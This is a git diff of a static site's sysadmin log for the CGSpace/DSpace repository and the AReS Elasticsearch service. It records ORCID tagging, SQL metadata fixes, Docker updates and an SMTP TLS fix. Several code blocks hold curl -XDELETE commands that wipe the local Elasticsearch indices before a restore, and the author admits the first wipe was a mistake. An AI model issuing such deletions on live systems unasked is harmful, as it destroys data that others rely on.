</span></span><span style="display:flex;"><span>Enter LDAP Password:
</span></span><span style="display:flex;"><span>ldap_bind: Invalid credentials (49)
</span></span><span style="display:flex;"><span> additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
</span></span></code></pre></div><ul>
<li>I sent a message to Biruk so he can check the LDAP account</li>
<li>IWMI confirmed that they do indeed want to move all their subjects to AGROVOC, so I made the changes in the XMLUI and config (<a href="https://github.com/ilri/DSpace/pull/467">#467</a>)
<ul>
@ -446,14 +446,14 @@ ldap_bind: Invalid credentials (49)
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ xmllint --xpath <span style="color:#e6db74">&#39;//value-pairs[@value-pairs-name=&#34;ccafsprojectpii&#34;]/pair/stored-value/node()&#39;</span> dspace/config/input-forms.xml
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ xmllint --xpath <span style="color:#e6db74">&#39;//value-pairs[@value-pairs-name=&#34;ccafsprojectpii&#34;]/pair/stored-value/node()&#39;</span> dspace/config/input-forms.xml
</span></span></code></pre></div><ul>
<li>I formatted the input file with tidy, especially because one of the new project tags has an ampersand character&hellip; grrr:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/input-forms.xml
line 3658 column 26 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
line 3659 column 23 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/input-forms.xml
</span></span><span style="display:flex;"><span>line 3658 column 26 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
</span></span><span style="display:flex;"><span>line 3659 column 23 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
</span></span></code></pre></div><ul>
<li>After testing whether this escaped value worked during submission, I created and merged a pull request to <code>6_x-prod</code> (<a href="https://github.com/ilri/DSpace/pull/468">#468</a>)</li>
</ul>
<h2 id="2021-05-18">2021-05-18</h2>
@ -461,34 +461,34 @@ line 3659 column 23 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU
<li>Paola from the Alliance emailed me some new ORCID identifiers to add to CGSpace</li>
<li>I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using <code>resolve-orcids.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-05-18-combined.txt
$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-05-18-combined.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
</span></span></code></pre></div><ul>
<li>I sorted the names and added the XML formatting in vim, then ran it through tidy:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-identifier.xml
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-identifier.xml
</span></span></code></pre></div><ul>
<li>Tag fifty-five items from the Alliance&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-05-18-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Urioste Daza, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
&#34;Urioste, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
&#34;Villegas, Daniel&#34;,Daniel M. Villegas: 0000-0001-6801-3332
&#34;Villegas, Daniel M.&#34;,Daniel M. Villegas: 0000-0001-6801-3332
&#34;Giles, James&#34;,James Giles: 0000-0003-1899-9206
&#34;Simbare, Alice&#34;,Alice Simbare: 0000-0003-2389-0969
&#34;Simbare, Alice&#34;,Alice Simbare: 0000-0003-2389-0969
&#34;Simbare, A.&#34;,Alice Simbare: 0000-0003-2389-0969
&#34;Dita Rodriguez, Miguel&#34;,Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
&#34;Templer, Noel&#34;,Noel Templer: 0000-0002-3201-9043
&#34;Jalonen, R.&#34;,Riina Jalonen: 0000-0003-1669-9138
&#34;Jalonen, Riina&#34;,Riina Jalonen: 0000-0003-1669-9138
&#34;Izquierdo, Paulo&#34;,Paulo Izquierdo: 0000-0002-2153-0655
&#34;Reyes, Byron&#34;,Byron Reyes: 0000-0003-2672-9636
&#34;Reyes, Byron A.&#34;,Byron Reyes: 0000-0003-2672-9636
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-05-18-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Urioste Daza, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
</span></span><span style="display:flex;"><span>&#34;Urioste, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
</span></span><span style="display:flex;"><span>&#34;Villegas, Daniel&#34;,Daniel M. Villegas: 0000-0001-6801-3332
</span></span><span style="display:flex;"><span>&#34;Villegas, Daniel M.&#34;,Daniel M. Villegas: 0000-0001-6801-3332
</span></span><span style="display:flex;"><span>&#34;Giles, James&#34;,James Giles: 0000-0003-1899-9206
</span></span><span style="display:flex;"><span>&#34;Simbare, Alice&#34;,Alice Simbare: 0000-0003-2389-0969
</span></span><span style="display:flex;"><span>&#34;Simbare, Alice&#34;,Alice Simbare: 0000-0003-2389-0969
</span></span><span style="display:flex;"><span>&#34;Simbare, A.&#34;,Alice Simbare: 0000-0003-2389-0969
</span></span><span style="display:flex;"><span>&#34;Dita Rodriguez, Miguel&#34;,Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
</span></span><span style="display:flex;"><span>&#34;Templer, Noel&#34;,Noel Templer: 0000-0002-3201-9043
</span></span><span style="display:flex;"><span>&#34;Jalonen, R.&#34;,Riina Jalonen: 0000-0003-1669-9138
</span></span><span style="display:flex;"><span>&#34;Jalonen, Riina&#34;,Riina Jalonen: 0000-0003-1669-9138
</span></span><span style="display:flex;"><span>&#34;Izquierdo, Paulo&#34;,Paulo Izquierdo: 0000-0002-2153-0655
</span></span><span style="display:flex;"><span>&#34;Reyes, Byron&#34;,Byron Reyes: 0000-0003-2672-9636
</span></span><span style="display:flex;"><span>&#34;Reyes, Byron A.&#34;,Byron Reyes: 0000-0003-2672-9636
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
</span></span></code></pre></div><ul>
<li>I deployed the latest <code>6_x-prod</code> branch on CGSpace, ran all system updates, and rebooted the server
<ul>
<li>This included the IWMI changes, so I also migrated the <code>cg.subject.iwmi</code> metadata to <code>dcterms.subject</code> and deleted the subject term</li>
@ -504,9 +504,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspa
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 47405
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
</span></span><span style="display:flex;"><span>UPDATE 47405
</span></span></code></pre></div><ul>
<li>That&rsquo;s interesting because we lowercased them all a few months ago, so these must all be new&hellip; wow
<ul>
<li>We have 405,000 total AGROVOC terms, with 20,600 of them being unique</li>
@ -518,12 +518,12 @@ UPDATE 47405
<ul>
<li>Export the top 5,000 AGROVOC terms to validate them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
COPY 5000
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-05-20-agrovoc.csv| sed 1d &gt; /tmp/2021-05-20-agrovoc.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
$ csvgrep -c <span style="color:#e6db74">&#34;number of matches&#34;</span> -r <span style="color:#e6db74">&#39;^0$&#39;</span> /tmp/2021-05-20-agrovoc-results.csv &gt; /tmp/2021-05-20-agrovoc-rejected.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 5000
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-05-20-agrovoc.csv| sed 1d &gt; /tmp/2021-05-20-agrovoc.txt
</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#34;number of matches&#34;</span> -r <span style="color:#e6db74">&#39;^0$&#39;</span> /tmp/2021-05-20-agrovoc-results.csv &gt; /tmp/2021-05-20-agrovoc-rejected.csv
</span></span></code></pre></div><ul>
<li>Meeting with Medha and Pythagoras about the FAIR Workflow tool
<ul>
<li>Discussed the need for such a tool, other tools being developed, etc</li>
@ -545,54 +545,54 @@ $ csvgrep -c <span style="color:#e6db74">&#34;number of matches&#34;</span> -r <
<ul>
<li>Add ORCID identifiers for missing ILRI authors and tag 550 others based on a few authors I noticed that were missing them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-05-24-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Patel, Ekta&#34;,&#34;Ekta Patel: 0000-0001-9400-6988&#34;
&#34;Dessie, Tadelle&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
&#34;Tadelle, D.&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
&#34;Dione, Michel M.&#34;,&#34;Michel Dione: 0000-0001-7812-5776&#34;
&#34;Kiara, Henry K.&#34;,&#34;Henry Kiara: 0000-0001-9578-1636&#34;
&#34;Naessens, Jan&#34;,&#34;Jan Naessens: 0000-0002-7075-9915&#34;
&#34;Steinaa, Lucilla&#34;,&#34;Lucilla Steinaa: 0000-0003-3691-3971&#34;
&#34;Wieland, Barbara&#34;,&#34;Barbara Wieland: 0000-0003-4020-9186&#34;
&#34;Grace, Delia&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
&#34;Rao, Idupulapati M.&#34;,&#34;Idupulapati M. Rao: 0000-0002-8381-9358&#34;
&#34;Cardoso Arango, Juan Andrés&#34;,&#34;Juan Andrés Cardoso Arango: 0000-0002-0252-4655&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-05-24-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Patel, Ekta&#34;,&#34;Ekta Patel: 0000-0001-9400-6988&#34;
</span></span><span style="display:flex;"><span>&#34;Dessie, Tadelle&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
</span></span><span style="display:flex;"><span>&#34;Tadelle, D.&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
</span></span><span style="display:flex;"><span>&#34;Dione, Michel M.&#34;,&#34;Michel Dione: 0000-0001-7812-5776&#34;
</span></span><span style="display:flex;"><span>&#34;Kiara, Henry K.&#34;,&#34;Henry Kiara: 0000-0001-9578-1636&#34;
</span></span><span style="display:flex;"><span>&#34;Naessens, Jan&#34;,&#34;Jan Naessens: 0000-0002-7075-9915&#34;
</span></span><span style="display:flex;"><span>&#34;Steinaa, Lucilla&#34;,&#34;Lucilla Steinaa: 0000-0003-3691-3971&#34;
</span></span><span style="display:flex;"><span>&#34;Wieland, Barbara&#34;,&#34;Barbara Wieland: 0000-0003-4020-9186&#34;
</span></span><span style="display:flex;"><span>&#34;Grace, Delia&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
</span></span><span style="display:flex;"><span>&#34;Rao, Idupulapati M.&#34;,&#34;Idupulapati M. Rao: 0000-0002-8381-9358&#34;
</span></span><span style="display:flex;"><span>&#34;Cardoso Arango, Juan Andrés&#34;,&#34;Juan Andrés Cardoso Arango: 0000-0002-0252-4655&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><ul>
<li>A few days ago I took a backup of the Elasticsearch indexes on AReS using elasticdump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</span></span></code></pre></div><ul>
<li>The indexes look OK so I started a harvesting on AReS</li>
</ul>
<h2 id="2021-05-25">2021-05-25</h2>
<ul>
<li>The AReS harvest got messed up somehow, as I see the number of items in the indexes are the same as before the harvesting:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
yellow open openrxv-items-final soEzAnp3TDClIGZbmVyEIw 1 1 953 0 2.3mb 2.3mb
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final soEzAnp3TDClIGZbmVyEIw 1 1 953 0 2.3mb 2.3mb
</span></span></code></pre></div><ul>
<li>Update all docker images on the AReS server (linode20):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose -f docker/docker-compose.yml down
$ docker-compose -f docker/docker-compose.yml build
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml down
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml build
</span></span></code></pre></div><ul>
<li>Then run all system updates on the server and reboot it</li>
<li>Oh crap, I deleted everything on AReS and restored the backup and the total items are now 104317&hellip; so it was actually correct before!</li>
<li>For reference, this is how I re-created everything:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
</span></span><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
</span></span><span style="display:flex;"><span>curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
</span></span></code></pre></div><ul>
<li>I will just start a new harvest&hellip; sigh</li>
</ul>
<h2 id="2021-05-26">2021-05-26</h2>
@ -605,8 +605,8 @@ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhos
</li>
<li>Looking in the DSpace log for this morning I see a big hole in the logs at that time (UTC+2 server time):</li>
</ul>
<pre tabindex="0"><code>2021-05-26 02:17:52,808 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: '10568/70659: item has country codes, skipping'
2021-05-26 02:17:52,853 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: '10568/66761: item has country codes, skipping'
<pre tabindex="0"><code>2021-05-26 02:17:52,808 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: &#39;10568/70659: item has country codes, skipping&#39;
2021-05-26 02:17:52,853 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: &#39;10568/66761: item has country codes, skipping&#39;
2021-05-26 03:00:05,772 INFO org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.spidersfile:null
2021-05-26 03:00:05,773 INFO org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.server:http://localhost:8081/solr/statistics
</code></pre><ul>
@ -638,18 +638,18 @@ May 26, 02:57 UTC
</code></pre><ul>
<li>And indeed the email seems to be broken:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace test-email
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
- To: fuuuuuu
- Subject: DSpace test email
- Server: smtp.office365.com
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
- Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace test-email
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
</span></span><span style="display:flex;"><span> - To: fuuuuuu
</span></span><span style="display:flex;"><span> - Subject: DSpace test email
</span></span><span style="display:flex;"><span> - Server: smtp.office365.com
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
</span></span><span style="display:flex;"><span> - Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
</span></span></code></pre></div><ul>
<li>I saw a recent thread on the dspace-tech mailing list about this that makes me wonder if Microsoft changed something on Office 365
<ul>
<li>I added <code>mail.smtp.ssl.protocols=TLSv1.2</code> to the <code>mail.extraproperties</code> in dspace.cfg and the test email sent successfully</li>

View File

@ -36,7 +36,7 @@ I simply started it and AReS was running again:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -132,8 +132,8 @@ I simply started it and AReS was running again:
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker-compose -f docker/docker-compose.yml start angular_nginx
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml start angular_nginx
</span></span></code></pre></div><ul>
<li>Margarita from CCAFS emailed me to say that workflow alerts haven&rsquo;t been working lately
<ul>
<li>I guess this is related to the SMTP issues last week</li>
@ -162,14 +162,14 @@ I simply started it and AReS was running again:
<ul>
<li>The Elasticsearch indexes are messed up so I dumped and re-created them correctly:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
</span></span><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
</span></span><span style="display:flex;"><span>curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
</span></span></code></pre></div><ul>
<li>Then I started a harvesting on AReS</li>
</ul>
<h2 id="2021-06-07">2021-06-07</h2>
@ -208,8 +208,8 @@ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhos
